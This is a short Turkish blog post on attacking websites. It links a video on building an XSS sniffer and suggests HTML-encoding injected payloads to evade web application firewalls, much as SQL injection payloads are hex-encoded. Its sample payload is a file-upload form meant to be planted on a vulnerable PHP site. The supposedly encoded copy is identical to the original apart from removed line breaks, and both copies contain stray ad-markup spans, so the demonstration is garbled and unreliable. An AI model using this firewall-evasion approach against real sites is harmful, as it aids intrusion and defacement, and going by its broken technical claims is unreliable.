1-Sniffer Hazırlama
2-Benim yöntemim
Not: Benim yöntemim tamamen bana ait değil ben sadece bu yöntemi bir abimden gördüm onunkini geliştirdim.
1-Sniffer Hazırlama
1-)tht deface teamdeyken bu videoyu hazırlamıştım
o yüzden o sitenin adını verdim saygı duyduğum bir sitedir.
youtube video-xss sniffer hazırlama
2-Benim yöntemim
Arkadaşlar manuel sql injecion yapanlar Bilirler bazı kodlarımızı güvenlik duvarı engellediği için bilgileri çekemeyebiliriz o zamanda o komutları hex leyip bypass ederiz.
Peki bunu neden XSS dede yapmayalım ki?
ama xss de hex çalışmaz çünkü html ile php birbirinden farklı xss html ile baglantılıdır sql ise asp yada php.Php için hex yapıyorsak html içinde "html encoder" kullanıcaz
Nasıl mı..
linux serverde yani php ile kodlanmış bir sitede xss açığı olsun bir html upload kodu örnek verelim
<form id="dosyayukle" action="upload.php" method="post" enctype=-<span class="i06t9mr20" id="i06t9mr20_8">multipart</span>/form-data">
<input type="file" name="dosya">
<input type="submit" value=-<span class="i06t9mr20" id="i06t9mr20_1">Ajax File Upload</span>->
</form>
<div id="progress">
<div id="bar"></div>
<div id="yuzde">0%</div >
</div>
<br/>
<div id="mesaj"></div>
</div>
<br/>
<div id="mesaj"></div>
bunu yazarsınız bazı sıtelerde bu kodlar güvenlik duvarı tarafından yakalanır ve çalışmaz.bu kodu html encoderde çevirdik
<form id="dosyayukle" action="upload.php" method="post" enctype=-<span class="i06t9mr20" id="i06t9mr20_8">multipart</span>/form-data">
<input type="file" name="dosya">
<input type="submit" value=-<span class="i06t9mr20" id="i06t9mr20_1">Ajax File Upload</span>->
</form><div id="progress"><div id="bar"></div><div id="yuzde">0%</div ></div><br/><div id="mesaj"></div></div><br/><div id="mesaj"></div>
bide bunu deneyin olacaktır kesin sonuç vermeyebilir ama bi köşede dursun sql de hexleyıınce ne kadar kesın sonuc alıyorsanız buda o kadar kesın.
Hiç yorum yok:
Yorum Gönder